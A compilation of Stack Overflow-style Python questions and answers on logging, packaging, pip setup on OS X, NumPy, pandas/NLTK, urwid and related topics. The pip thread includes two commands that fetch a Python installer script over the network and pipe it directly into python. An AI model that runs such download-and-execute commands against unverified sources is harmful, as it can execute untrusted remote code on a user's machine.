Spyder Variable explorer how to show custom data types? Question: The Spyder Variable explorer looks very interesting to me, but currently it can show only a limited number of data types: <https://pythonhosted.org/spyder/variableexplorer.html> If I define a **custom** class/data type, its instances will not show in the Variable explorer by default; if I _uncheck_ the option "Exclude unsupported data types", then an overwhelming number of (global) variables and functions will show up in the Variable explorer, making it very hard to use. So my questions are: 1. is there a protocol/configuration to **add a custom data type** to the "list of supported data types" of Spyder, so that the custom data type will show in the Variable explorer by default? (e.g., by making the custom data type picklable?) 2. is it possible for the Variable explorer to show only variables created **after** starting Spyder/IPython console (after loading pylab or whatever in the IPython startup script etc.)? If so, a lot of variables can be filtered out and users can focus on the new variables. 3. is there a switch to simply apply a filter to the data types in the Variable explorer, e.g., filtering out all functions/methods/class definitions and leaving only the class instances/primitives, so that the Variable explorer is more focused on the "data", similar to the Matlab style? BTW, is there any "best practice" configuration of the Variable explorer for "data-oriented" development? Thank you all in advance! Answer: (_Spyder dev here_) Regarding your questions: 1. No, there is no configuration to add custom data types. We haven't considered that important so far because all the data types we support have an associated specialized viewer (e.g. DataFrames and NumPy arrays). 2. You'll be happy to know that since Spyder 2.3.2 (to be released in a few days), our IPython consoles will show far fewer variables than in previous versions. There was an error that led us to pollute the variable explorer, and it was fixed in this version. 3. We don't have any such filter, but I think it's not hard to add. Please open an issue in our issue tracker so that we don't forget to work on it for 2.4.
How should logging be used in a Python package? Question: I am currently developing a package which can be used without writing any new code and the modules can be used to develop new code (see [documentation](https://pythonhosted.org/hwrt/)). Many of my modules use [`logging`](https://docs.python.org/2/library/logging.html) in a very simple way: import logging import sys logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG, stream=sys.stdout) # Code of the module follows I have these lines in many modules. It seems to me that I should factor it out, but I am not sure what the best / recommended / most pythonic way to do so is. The relevant parts in the logging documentation seem to be [Configuring Logging for a Library](https://docs.python.org/2/howto/logging.html#configuring-logging-for- a-library) and [Logging from multiple modules](https://docs.python.org/2/howto/logging.html#logging-from-multiple- modules). I guess I should simply move the line `logging.basicConfig` to the executables (`bin/hwrt`) and remove all other `logging.basicConfig` lines. Is there any rule how packages should use logging (like PEP8 for coding style)? If other developers use my code they might want to disable / modify the way my package does logging (so that it doesn't get mixed with their logging calls). Is there a way to help them do so? Answer: Your library should _not_ configure logging; that's an application-wide task. Instead, just set up your logger object based on `__name__`, use that, and that's it. Document that you use `logging`, and developers using your library can use the standard `logging` API to configure logging. You could add a null handler to your root logger (the logger registered for your package name) to prevent a default configuration being used if the application didn't set one: # This goes into your library somewhere logging.getLogger('name.of.library').addHandler(logging.NullHandler()) and developers using your library can then disable all logging _just for your library_ by disabling log propagation: logging.getLogger('name.of.library').propagate = False All this is already documented in the `logging` module; you can consider it the style guide for Python logging. From the [_Configuring Logging for a Library_ section](https://docs.python.org/2/howto/logging.html#configuring- logging-for-a-library) you already linked to: > **Note** : It is strongly advised that you do not add any handlers other > than NullHandler to your library’s loggers. This is because the > configuration of handlers is the prerogative of the application developer > who uses your library. The application developer knows their target audience > and what handlers are most appropriate for their application: if you add > handlers ‘under the hood’, you might well interfere with their ability to > carry out unit tests and deliver logs which suit their requirements. `logging.basicConfig()` does just that; it creates handler configuration.
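To make the pieces of the answer above concrete, here is a minimal sketch of how the layout could look for the package in the question (the package name `hwrt` and the executable `bin/hwrt` come from the question; the module and function names are just placeholders):

    # hwrt/__init__.py -- the library only attaches a NullHandler, nothing else
    import logging
    logging.getLogger(__name__).addHandler(logging.NullHandler())

    # hwrt/some_module.py -- each module gets its own logger via __name__
    import logging
    logger = logging.getLogger(__name__)  # e.g. "hwrt.some_module"

    def do_something():
        logger.debug("doing something")

    # bin/hwrt -- only the executable/application configures handlers
    import logging
    import sys
    logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
                        level=logging.DEBUG, stream=sys.stdout)

Note that `logging.NullHandler` requires Python 2.7 or later, which matches the Python 2 documentation linked in the question.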
Python - Merging 2 lists of tuples by checking their values Question: I have lists like this: a = [('JoN', 12668, 0.0036), ('JeSsIcA', 1268, 0.0536), ('JoN', 1668, 0.00305), ('King', 16810, 0.005)] b = [('JoN', 12668, 0.0036), ('JON', 16680, 0.00305), ('MeSSi', 115, 0.369)] I want the resultant list to be like: result = [(('JoN', 12668, 0.0036), ('JoN', 12668, 0.0036)), (('JoN', 1668, 0.00305), ('JON', 16680, 0.00305)), (('King', 16810, 0.005), None), (None, ('MeSSi', 115, 0.369))] I have tried nested loops, sets, map, zip but failed to achieve this output. kindly help me out. Answer: Convert `a` and `b` to dictionaries first using the first(use `str.lower()` in it) and third item as key and then later on loop on the union of the keys in a list comprehension to get the desired output: >>> from pprint import pprint >>> dct_a = {(x[0].lower(), x[2]): x for x in a} >>> dct_b = {(x[0].lower(), x[2]): x for x in b} >>> out = [(dct_a.get(k), dct_b.get(k)) for k in set(dct_a).union(dct_b)] >>> pprint(out) [(('JoN', 12668, 0.0036), ('JoN', 12668, 0.0036)), (('JoN', 1668, 0.00305), ('JON', 16680, 0.00305)), (('King', 16810, 0.005), None), (('JeSsIcA', 1268, 0.0536), None), (None, ('MeSSi', 115, 0.369))]
How do I execute a Maya script without launching Maya? Question: For example, I want to launch a script that creates a poly cube and exports it to .stl or .fbx from the command line. I can do it in Python by using the Maya standalone, but apparently it cannot handle exporting to formats other than .ma. Answer: Why of course you can. Here's how you'd do exactly that (for FBX):

    from os.path import join
    from maya.standalone import initialize
    import maya.cmds as cmds
    import maya.mel as mel

    initialize("python")
    cmds.loadPlugin("fbxmaya")

    my_cube = cmds.polyCube()
    cmds.select(my_cube[0], r=True)

    my_filename = "cube2.fbx"
    my_folder = "C:/SomeFolder/scenes"
    full_file_path = join(my_folder, my_filename).replace('\\', '/')

    mel.eval('FBXExport -f "%s"' % full_file_path)

Hope that was useful.
Python tries to install everything into /lib on os x Question: I think that somehow the path /lib is stored in my python dist where it should not be. It started when I was having troubles installing python modules using pip. Pip seemed to install everything into /lib/python2.7/site-packages where python could not find it. Sidenote: pip uninstall could not find the package in /lib either, but it is where pip install would install it. I tried: which pip $/usr/bin/pip $which python /usr/bin/python I decided to uninstall pip, but then $ easy_install uninstall pip error: can't create or remove files in install directory The following error occurred while trying to add or remove files in the installation directory: [Errno 13] Permission denied: '/lib' The installation directory you specified (via --install-dir, --prefix, or the distutils default setting) was: /lib/python2.7/site-packages/ It seemed that even in my easy-install, the '/lib' location was used. I googled a bit, and decided to reinstall easy-install. I removed it: $sudo rm /usr/local/bin/easy_install And tried to install it again: $ sudo curl https://bootstrap.pypa.io/ez_setup.py -o - | python Checking .pth file support in /lib/python2.7/site-packages/ error: can't create or remove files in install directory So my problem is basically that I want to get my python installation as clean as possible, and that this /lib location is stored somewhere. Some side information * I am getting more familiar with the file structure of python now but I used to know little about it. I also had many problems installing python packages so I used many different python versions trough tutorials. (Via brew, canopy, anaconda, ipython). I uninstall most of them because I just want a clean installation as possible. (I once had tried to uninstall a site-package and I discovered that it was stored in 4 different locations simultaniously!) * > $ which python > > /usr/bin/python * Most of my site-packages right now are installed in: > /usr/local/lib/python2.7/site-packages > > /Users/myusersname/Library/Python/2.7/lib/python/site-packages * Empty: > $ echo $PYTHONPATH * OS-X 10.9.5 I hope you guys can help me! easy install pip I want to get everything as clean as possible so I uninstalled my homebrew version of python. **EDIT** : **Python from homebrew** So I uninstalled all python versions except the system one (/usr/bin/python). Now I tried to install python via homebrew (/usr/local/bin/python does link to cellar). When I try to run pip: $which pip /usr/local/pip $pip Traceback (most recent call last): File "/usr/local/bin/pip", line 5, in <module> from pkg_resources import load_entry_point File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2603, in <module> working_set.require(__requires__) File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 666, in require needed = self.resolve(parse_requirements(requirements)) File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 565, in resolve raise DistributionNotFound(req) # XXX put more info here pkg_resources.DistributionNotFound: pip==1.5.6 When I try to sudo easy_install -U pip TEST FAILED: /lib/python2.7/site-packages/ does NOT support .pth files error: bad install directory or PYTHONPATH **Python from python.org** I uninstalled homebrew python and installed python using the GUI installer from the website. 
I checked that /usr/local/bin/python does link to this python. This python does not come with pip or easy_install. So I run setuptools:

    $ sudo python ez_setup.py
    Extracting in /tmp/tmpR80Ydp
    Now working in /tmp/tmpR80Ydp/setuptools-7.0
    Installing Setuptools
    running install
    Checking .pth file support in /lib/python2.7/site-packages/
    /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -E -c pass
    TEST FAILED: /lib/python2.7/site-packages/ does NOT support .pth files
    error: bad install directory or PYTHONPATH
    You are attempting to install a package to a directory that is not
    on PYTHONPATH and which Python does not read ".pth" files from. The
    installation directory you specified (via --install-dir, --prefix, or
    the distutils default setting) was:
        /lib/python2.7/site-packages/

This is the error I am always getting. It is very persistent and I hope you guys can help me with it. I already tried some of the solutions here: * [Python pip broken after OS X 10.8 upgrade](http://stackoverflow.com/questions/11704379/python-pip-broken-after-os-x-10-8-upgrade) * [pip install on Mac OS X - PYTHONPATH](http://stackoverflow.com/questions/25978475/pip-install-on-mac-os-x-pythonpath) but nothing helps. Setting the PYTHONPATH, or running with or without sudo, doesn't help either.

    export PYTHONPATH='/Library/Python/2.7/site-packages'

Answer: If you want to get your python installation as clean as possible you should consider using a virtual environment.

    $ sudo pip install virtualenv
    $ pyvenv env # create a virtual environment
    $ source env/bin/activate # activate the virtual environment
    (env) $ curl https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python # install pip in the virtualenv

This works for Python 3.4, but it should be similar for Python 2.7. Then you can install packages as you would normally do:

    (env) $ pip install [package name]

All the packages you install this way will be saved in the "env" directory. If you want to run a program inside the virtual environment you have to activate it first. When you are done, you can simply deactivate it.

    (env) $ deactivate
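A quick way to see where a given interpreter will put packages by default — which is where the stray `/lib` path above has to be coming from — is to ask `distutils` directly; this is only a diagnostic sketch using the standard library, run with the same interpreter that pip/easy_install use:

    # run with the interpreter in question, e.g. /usr/bin/python
    import sys
    from distutils.sysconfig import get_python_lib

    print(sys.executable)     # which interpreter this actually is
    print(sys.prefix)         # its installation prefix
    print(get_python_lib())   # where distutils/setuptools install by default

If the default location printed here looks sane but installs still end up under `/lib`, a per-user or global distutils configuration file (for example a `~/.pydistutils.cfg` or a stray `setup.cfg` with an `[install]` prefix setting) is a likely culprit worth checking.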
xml string is enclosed with b'<xml_string>' while generating from dictionary using dicttoxml module Question: I am using [dicttoxml](https://pypi.python.org/pypi/dicttoxml) module for converting dictionary into xml. **Code:** cfg_dict = { 'mobile' : { 'checkBox_OS' : { 'status' : 'None', 'radioButton_Andriod' : { 'status' : 'None', 'comboBox_Andriod_Brands' : 'LG'}, 'radioButton_Windows' : { 'status' : 'None', 'comboBox_Windows_Brands' : 'Nokia'}, 'radioButton_Others' : { 'status' : 'None', 'comboBox_Others_Brands' : 'Apple'}}, 'checkBox_Screen_size' : { 'status' : 'None', 'doubleSpinBox_Screen_size' : '5.0' }} } from dicttoxml import dicttoxml xml = dicttoxml(self.cfg_dict) print (xml) **Output:** b'<?xml version="1.0" encoding="UTF-8" ?><root><mobile type="dict"><checkBox_OS type="dict"><radioButton_Andriod type="dict"><status type="bool">false</status><comboBox_Andriod_Brands type="str">Sony</comboBox_Andriod_Brands></radioButton_Andriod><radioButton_Windows type="dict"><status type="bool">false</status><comboBox_Windows_Brands type="str">HTC</comboBox_Windows_Brands></radioButton_Windows><status type="bool">false</status><radioButton_Others type="dict"><status type="bool">false</status><comboBox_Others_Brands type="str">Apple</comboBox_Others_Brands></radioButton_Others></checkBox_OS><checkBox_Screen_size type="dict"><doubleSpinBox_Screen_size type="float">5.0</doubleSpinBox_Screen_size><status type="bool">false</status></checkBox_Screen_size></mobile></root>' I do not know why it is enclosed with b' '. How to generate xml string without this b''? Browser is also giving error msg when opening xml file with this content. Answer: That is the normal represenation of a String that is not Unicode in Python 3. Try this in the Python shell: >>> type("foo") <class 'str'> >>> type(b"foo") <class 'bytes'> >>> type("Rübe") <class 'str'> >>> type(b"Rübe") File "<stdin>", line 1 SyntaxError: bytes can only contain ASCII literal characters. So everything is OK. You don't have a problem. See also [`str`](https://docs.python.org/3/library/stdtypes.html#text- sequence-type-str) vs [`bytes`](https://docs.python.org/3/library/stdtypes.html#binary-sequence- types-bytes-bytearray-memoryview). **Edit:** See how encoding and decoding works. >>> s = "Rübe" >>> e = s.encode("UTF-8") >>> print(e) b'R\xc3\xbcbe' >>> type(e) <class 'bytes'> >>> d = e.decode("UTF-8") >>> d 'Rübe' So just use `my_byte_string.decode(my_encoding)` where `my_encoding` is probably `"UTF-8"`.
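In other words, the `b''` is only the `bytes` representation; if you want a plain string (for printing or writing to a text file), decode it. A minimal sketch reusing the `cfg_dict` from the question (the output filename is just an example):

    from dicttoxml import dicttoxml

    xml_bytes = dicttoxml(cfg_dict)        # bytes -> printed as b'...'
    xml_str = xml_bytes.decode("UTF-8")    # str, no b'' prefix
    print(xml_str)

    with open("mobile.xml", "w", encoding="UTF-8") as f:
        f.write(xml_str)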
How to handle dependency on scipy in setup.py Question: I am trying to create a `setup.py` for a project that depends on SciPy. The following `setup.py` reproduces this: setup( name='test', version='0.1', install_requires=['scipy'] ) When installing this using `python setup.py develop` it generates the following error: ImportError: No module named numpy.distutils.core However, when I install scipy using `pip`, it installed it from a wheel, and it works just fine. So, my questions is, how can I create a `setup.py` that depends on SciPy? Why won't `setuptools` install dependencies from wheels? Would this work better when using Python 3 (we plan to migrate anyway, so if it works there, I'll just wait until the migration is complete). I am using Python 2.7.8 on Mac OS X 10.10.1 with `setuptools` 3.6 and `pip` 1.5.6. Answer: Ultimately, this worked for me: #!/usr/bin/env python from setuptools import setup, Extension from setuptools.command.build_ext import build_ext as _build_ext # # This cludge is necessary for horrible reasons: see comment below and # http://stackoverflow.com/q/19919905/447288 # class build_ext(_build_ext): def finalize_options(self): _build_ext.finalize_options(self) # Prevent numpy from thinking it is still in its setup process: __builtins__.__NUMPY_SETUP__ = False import numpy self.include_dirs.append(numpy.get_include()) setup( # # Amazingly, `pip install scipy` fails if `numpy` is not already installed. # Since we cannot control the order that dependencies are installed via # `install_requires`, use `setup_requires` to ensure that `numpy` is available # before `scipy` is installed. # # Unfortunately, this is *still* not sufficient: `numpy` has a guard to # check when it is in its setup process that we must circumvent with # the `cmdclass`. # setup_requires=['numpy'], cmdclass={'build_ext':build_ext}, install_requires=[ 'numpy', 'scipy', ], ... )
Python Requests: Don't wait for request to finish Question: In Bash, it is possible to execute a command in the background by appending `&`. How can I do it in Python? while True: data = raw_input('Enter something: ') requests.post(url, data=data) # Don't wait for it to finish. print('Sending POST request...') # This should appear immediately. Answer: I use `multiprocessing.dummy.Pool`. I create a singleton thread pool at the module level, and then use `pool.apply_async(requests.get, [params])` to launch the task. This command gives me a future, which I can add to a list with other futures indefinitely until I'd like to collect all or some of the results. `multiprocessing.dummy.Pool` is, against all logic and reason, a THREAD pool and not a process pool. Example (works in both Python 2 and 3, as long as requests is installed): from multiprocessing.dummy import Pool import requests pool = Pool(10) # Creates a pool with ten threads; more threads = more concurrency. # "pool" is a module attribute; you can be sure there will only # be one of them in your application # as modules are cached after initialization. if __name__ == '__main__': futures = [] for x in range(10): futures.append(pool.apply_async(requests.get, ['http://example.com/'])) # futures is now a list of 10 futures. for future in futures: print(future.get()) # For each future, wait until the request is # finished and then print the response object. The requests will be executed concurrently, so running all ten of these requests should take no longer than the longest one. This strategy will only use one CPU core, but that shouldn't be an issue because almost all of the time will be spent waiting for I/O.
urwid watch_file blocks keypress Question: I have the following urwid program that displays the key pressed, or any line that comes in from the Popen'd program: #!/usr/bin/env python import urwid from threading import Thread from subprocess import Popen, PIPE import time import os class MyText(urwid.Text): def __init__(self): super(MyText, self).__init__('Press Q to quit', align='center') def selectable(self): return True def keypress(self, size, key): if key in ['q', 'Q']: raise urwid.ExitMainLoop() else: self.set_text(repr(key)) class Writer(object): def __init__(self): self._child = Popen( 'for i in `seq 5`; do sleep 1; echo $i; done', #"ssh localhost 'for i in `seq 5`; do sleep 1; echo $i; done'", shell=True, stdout=PIPE, stderr=PIPE) def file(self): return self._child.stdout def fileno(self): return self._child.stdout.fileno() w = Writer() txt = MyText() top = urwid.Filler(txt) mainloop = urwid.MainLoop(top) def on_writer(): c = w.file().read(1) if c == '': # terminated mainloop.remove_watch_file(w.fileno()) return if c == '\n': return txt.set_text(c) mainloop.draw_screen() mainloop.watch_file(w.fileno(), on_writer) mainloop.run() The above program works, but if I change the Popen'd command to the `ssh localhost ...` version, the program stops displaying keypresses until the `ssh localhost ...` command finishes. Why is that? Environment: CentOS 6.6, Python 2.7.4, urwid 1.3.1-dev. Answer: The problem is that ssh tries to operate its `stdin`. Setting its `stdin` to a dummy file descriptor fixes it. class Writer(object): def __init__(self): r, w = os.pipe() self._child = Popen( #'for i in `seq 5`; do sleep 1; echo $i; done', "ssh localhost 'for i in `seq 5`; do sleep 1; echo $i; done'", shell=True, stdin=r, stdout=PIPE, stderr=PIPE) os.close(w)
Python - search and replace vowels in string Question: i need to write code in Python that will be able to detect if a certain character in a string is there and replace it with another character of my choice. for example, i need to replace all vowels in a string with "$&@", so after the string "hello world" goes through the code, it will turn into "h$&@ll$&@ w$&@rld". Does anybody know how to do this using very basic python and not really any pre existing functions? thank you Answer: Use [re](https://docs.python.org/2/library/re.html) module: import re string = "Hello world" print(re.sub("a|e|i|o|u", "xx", string)) this will print >>> Hxxllxx wxxrld
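Since the question asks for very basic Python without pre-existing helpers, here is a sketch that does the same thing with a plain loop, using the `$&@` replacement from the question:

    def replace_vowels(text, replacement="$&@"):
        result = ""
        for ch in text:
            if ch.lower() in "aeiou":   # also catches upper-case vowels
                result += replacement
            else:
                result += ch
        return result

    print(replace_vowels("hello world"))   # h$&@ll$&@ w$&@rld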
Python nosetests runs tests twice Question: I'm setting up a Python Continuous Integration server, using Jenkins, and nosetests keeps running the same tests twice. I'm not importing the tests anywhere. Here's the command I'm running:

    nosetests --with-xcoverage --with-xunit --all-modules --traverse-namespace --cover-package=app --cover-inclusive --cover-erase -x

Any ideas? It's a Flask-Restful app. Answer: I had a similar issue. After turning up verbosity (as suggested by Schollii above) and comparing notes on [this question](http://stackoverflow.com/questions/6197940/nosetest-including-unwanted-parent-directories), what worked for me was deleting the `__init__.py` (and `__init__.pyc`, of course) in my main code folder (of which tests were a subdirectory).
How do I plot a histogram using Python so that x-values are frequencies of a spectra? Question: I looked at the python "matplotlib.pylab" library, which allows me to plot histograms with the "plt.hist" function. The problem is that it only takes one data argument, which is an array. In my case, I want to plot a histogram of the data produced by a Fourier transform. A Fourier transform shows the relative quantity of various frequencies. So I could put this array of quantities into "plt.hist" and get an informative chart, but the x-axis would not be in units of frequency. My guess is that the x-axis would just be the indices of the array, but even that doesn't seem to be correct when I plot it. Thanks, Answer: Naive answer for making a _histogram_ of `X`, the DFT of a time domain signal `x`

    import matplotlib.pyplot as plt
    import numpy as np
    ...
    w = np.linspace(0,N*dw-dw,N)
    plt.bar(w, abs(X), align='center', width=dw)
    plt.show()

For a nice looking plot, you have to take into account that `X` is associated with frequencies `0*dw, 1*dw, ..., (N-1)*dw` and that, in a nice looking plot, you usually want to use the range `-N*dw/2`, `+N*dw/2` for your abscissas.

### Complete answer

    import matplotlib.pyplot as plt
    import numpy as np
    np.random.seed(57)

    N = 64 ; dw = 0.2
    w = np.linspace(0,N*dw-dw,N)
    X = 200 + (np.arange(N)-N/2)**2*np.random.random(N)

    plt.bar(w, abs(X), align='center', width=dw)
    plt.xticks([i*8*dw for i in range(N/8)]+[N*dw-dw/2])
    plt.xlim(-dw/2,N*dw-dw/2)
    plt.show()

And this is the result so far ![enter image description here](http://i.stack.imgur.com/HfrmZ.png) As you can see, this type of plot kind of stresses the periodicity of the DFT, but it is customary to plot the DFT centered around the zero frequency, and this can be done like this

    w2=np.concatenate((w-N*dw,w))
    X2=np.concatenate((X,X))
    plt.bar(w2, abs(X2), align='center', width=dw)
    plt.xticks([i*8*dw for i in range(-N/16,1+N/16)])
    plt.xlim(-dw*N/2,dw*N/2)
    plt.show()

and this is the result ![enter image description here](http://i.stack.imgur.com/G5Cnz.png)

### Post Scriptum

The procedures I described are good for the OP's needs, but I'd like to say that the `X` data has been thoughtlessly synthesized on the spot and has no resemblance to a real-life DFT. On the contrary, if I saw something like the plots above I'd comment on the insufficient sampling rate in the time domain.
Python package naming issue Question: I have a python package named gutils, which contains a lot of useful tools for development; some of them are generic, some of them use reportlabs, and the most important part forms a layer of abstraction on top of django, customizing a lot of default behaviour. I would like to keep the convention of the exterior interface similar to django's, so as not to add complexity to the development process. I have this structure (as an example):

    gutils
    |---- django
    |     |---- forms
    |           |--- widgets.py

The problem is, inside this widgets.py file, the imports resolve to the current subpackage. For example:

    from django.forms import TextInput

is treated as if it were:

    from gutils.django.forms import TextInput

As a workaround, I've named the top-level package gdjango, but it looks awkward. So, the question is: is there a way to reference the real django package from within the gutils.django package? **NOTE:** I'm using python 3 Answer: If you're dealing with a package, for example, like this:

    mypackage/
        mypackagesubdir/
            myfile.py
        mypackagesubdirII/
            myfileII.py

and you're editing `myfile.py`, import `myfileII` with an explicit relative import: `from ..mypackagesubdirII import myfileII`. A single leading dot refers to the package containing the current module (`mypackagesubdir` here), and each additional dot goes one package further up, so plain absolute imports such as `from django.forms import ...` stay reserved for the real installed packages.
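Applied to the `gutils` layout from the question, a minimal sketch of `gutils/django/forms/widgets.py` could look like the following. This assumes `gutils` is imported as a package (i.e. its *parent* directory is on `sys.path`, not the `gutils` directory itself) and Python 3, where imports are absolute by default; `fields` and the class names are hypothetical:

    # gutils/django/forms/widgets.py
    from django.forms import TextInput   # the real, installed django
    from .fields import MyField          # sibling module inside gutils.django.forms

    class MyTextInput(TextInput):
        """Thin wrapper around the real django widget."""
        pass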
Too many values to unpack using NLTK and Pandas in Python Question: I am trying out different things to make the NLTK's naive bayes work using the NLTK and Pandas modules, but I am getting the "too many values to unpack" error.

    import pandas as pd
    from pandas import DataFrame, Series
    import numpy as np
    import re
    import nltk

    ### Remove cases with missing name or missing ethnicity information
    def read_file():
        data = pd.read_csv("C:\sample.csv", encoding="utf-8")
        frame = DataFrame(data)
        frame.columns = ["Name", "Gender"]
        return frame

    #read_file()

    def gender_features(word):
        return {'last_letter': word[-1]}

    #gender_features()

    frame = read_file()
    featuresets = [(gender_features(n), gender) for (n, gender) in frame]
    train_set, test_set = features[500:], featuresets[:500]
    classifier = nltkNaiveBayesClassifier.train(train_set)

Answer: I suspect you are trying to do something bigger than name classification when using `pandas.DataFrame`, because the `DataFrame` object is normally used when you have limited RAM and want to make use of disk space as you iterate through the data to extract features:

> a 2-dimensional labeled data structure with columns of potentially different types. You can think of it like a spreadsheet or SQL table, or a dict of Series objects. It is generally the most commonly used pandas object. Like Series, DataFrame accepts many different kinds of input:
>
> * Dict of 1D ndarrays, lists, dicts, or Series
> * 2-D numpy.ndarray
> * Structured or record ndarray
> * A Series
> * Another DataFrame

I suggest you go through the `pandas` tutorial to learn about the library first: <http://pandas.pydata.org/pandas-docs/dev/tutorials.html> And then learn about NLTK classification from <http://www.nltk.org/book/ch06.html>

* * *

Firstly, there are several things wrong with how you access the `pandas.DataFrame` object. To iterate through the rows of the dataframe, you should do this:

    # Read file into pandas dataframe
    df = DataFrame(pd.read_csv('sample.csv'))
    df.columns = ['name', 'gender']

    for index, row in df.iterrows():
        print row['name'], row['gender']

Next, to train a classifier, you should do this:

    import numpy as np
    import pandas as pd
    from pandas import DataFrame, Series
    from nltk.corpus import names
    from nltk.classify import NaiveBayesClassifier as nbc

    # Create a sample.csv file
    male_names = [','.join([i,'m']) for i in names.words('male.txt')]
    female_names = [','.join([i,'f']) for i in names.words('female.txt')]
    with open('sample.csv', 'w') as fout:
        fout.write('\n'.join(male_names+female_names))

    # Feature extractor function.
    def gender_features(word):
        return {'last_letter': word[-1]}

    # Read file into pandas dataframe
    df = DataFrame(pd.read_csv('sample.csv'))
    df.columns = ['name', 'gender']

    # Extract features.
    featuresets = [(gender_features(name), gender) for index, (name, gender) in df.iterrows()]

    # Split train and test set
    train_set, test_set = featuresets[500:], featuresets[:500]

    # Train a classifier
    classifier = nbc.train(train_set)

    # Test classifier on "Neo"
    print classifier.classify(gender_features('Neo'))

[out]: m
Swapping two characters in a 2D array in python? Question: So, I'm brand new to programming, and this is frustrating me! What I want to do is be able to import a 4x8 text file, and turn the text into a 2D list so that I can swap two characters. For example, if the imported text file looks like this: OOOOOOOO OOOXOOOO OOOOOOOO OOOOOOOO then I would like to be able to change the position of the X (the row/column location) when user input is entered, such that an O will get put in its place to preserve formatting. So, for exapmle, the program will prompt the user for their input and if the user enters "up," then the X will move one space up. OOOXOOOO OOOOOOOO OOOOOOOO OOOOOOOO I want it to repeatedly prompt for a new move after each time one is made, and display the new grid each time (so you can see the X in its new position each time you enter a movement). This is all I have so far. I know I need to first find the X, but I really don't know how to. I'm stuck here. Any help is appreciated. #Global variables for the movements UP = 8 DOWN = 2 RIGHT = 6 LEFT = 4 #Dimensions of grid ROWS = 4 COLUMNS = 8 def start(): filename = input("Enter the name of the Start Positions file: ") textFile = open(filename) aMaze = [line.strip() for line in textFile] for r in range(ROWS): for c in range(COLUMNS): print(aMaze[r][c], end="") print() def moveType(): while (True): try: move = input("ENTER YOUR MOVE: ") except ValueError: print("unimportant error message") continue if ((int(move)) in (DOWN, LEFT, RIGHT, UP)): playerMove(move) continue else: print("unimportant error message") continue return(move) def playerMove(move): move = (int(move)) if (move == DOWN): #need help here elif (move == UP): #and here elif (move == LEFT): #don't know what i'm doing elif (move == RIGHT): #also here start() moveType() Answer: This is a perfect opportunity to learn about abstraction. To solve your problem, think about the sub problems you could solve (with functions) that would make your final problem easier. In your specific instance, wouldn't it be easier to write a program to find the Cartesian coordinates of where X is? With an (x,y) coordinate, you could then make a function to turn that coordinate (likely stored as a tuple) into a 2d array where that coordinate is an X an everything else is a zero. Hint 1: x =0 y =0 for row in numrows: for col in numcols: if array[row][col] == X y = row x = col Hint 2: for row in numrows: for col in numcols: if col is x and row is y: place X else: place O Note: if this were an application where you wanted to eek out every bit of performance, you certainly would not need to iterate through your array every time to find X. You could (and should) opt to store the location of X and then use two accesses into your array to flip X's and O's. But seeing as this is likely one of your first problems you are solving this is of course not a concern. Hope this helps! Good luck starting to code!
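To tie the hints above together, here is a minimal runnable sketch. It assumes the 4x8 grid and the 8/2/4/6 move codes from the question and a plain list-of-lists grid; names like `find_x` and `move_x` are just illustrative:

    ROWS, COLUMNS = 4, 8
    UP, DOWN, LEFT, RIGHT = 8, 2, 4, 6

    def find_x(grid):
        """Return the (row, col) position of the 'X' character."""
        for r in range(ROWS):
            for c in range(COLUMNS):
                if grid[r][c] == 'X':
                    return r, c

    def move_x(grid, move):
        """Move the 'X' one cell, leaving an 'O' behind; ignore moves off the grid."""
        r, c = find_x(grid)
        offsets = {UP: (-1, 0), DOWN: (1, 0), LEFT: (0, -1), RIGHT: (0, 1)}
        dr, dc = offsets[move]
        nr, nc = r + dr, c + dc
        if 0 <= nr < ROWS and 0 <= nc < COLUMNS:
            grid[r][c], grid[nr][nc] = 'O', 'X'

    def show(grid):
        for row in grid:
            print(''.join(row))

    grid = [list(line) for line in ['OOOOOOOO', 'OOOXOOOO', 'OOOOOOOO', 'OOOOOOOO']]
    move_x(grid, UP)    # 8 == UP in the question's constants
    show(grid)

Because the grid is stored as a list of lists (one list per row), individual characters can be assigned in place, which is what makes the swap possible; the plain strings read from the file would have to be converted first, e.g. with `list(line)` as above.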
Understanding slicing in python Question: import numpy as np x = np.arange(10**5) for i in xrange(x.size): foo(x[3000:40000]) and just another version of the code above import numpy as np x = np.arange(10**5) slice_of_x = x[3000:40000] for i in xrange(x.size): foo(slice_of_x) Will the second code be faster or not? I am inclined to think in terms of pointer in C (so that infact the first may be faster) but I understand python is no C. O.k. This post [Slicing a list in Python without generating a copy](http://stackoverflow.com/questions/5131538/slicing-a-list-in-python- without-generating-a-copy) answers my question. Answer: Read this <http://scipy-lectures.github.io/advanced/advanced_numpy/#life-of- ndarray>, in particular the section [Slicing with integers](http://scipy- lectures.github.io/advanced/advanced_numpy/#slicing-with-integers). From the page [on slicing] > Everything can be represented by changing only shape, strides, and possibly > adjusting the data pointer! Never makes copies of the data So the overhead of creating a slice is small: constructing a Python object which stores a few tuples and a pointer to the data. In your first code sample, you create the slice in the loop each time. In the second example you create the slice once. The difference will probably be negligible for most functions `foo` that you would choose to write.
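A tiny experiment makes the "no copy" point concrete: a basic slice of a NumPy array is a view onto the same buffer, so the only cost in the first snippet is building a small view object on every iteration:

    import numpy as np

    x = np.arange(10**5)
    s = x[3000:40000]      # a view: no data is copied

    print(s.base is x)     # True -> s shares x's memory
    s[0] = -1              # writing through the view...
    print(x[3000])         # ...changes the original: prints -1

Note that this applies to NumPy arrays; slicing a plain Python list does create a new list of references, which is what the question linked at the end is about.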
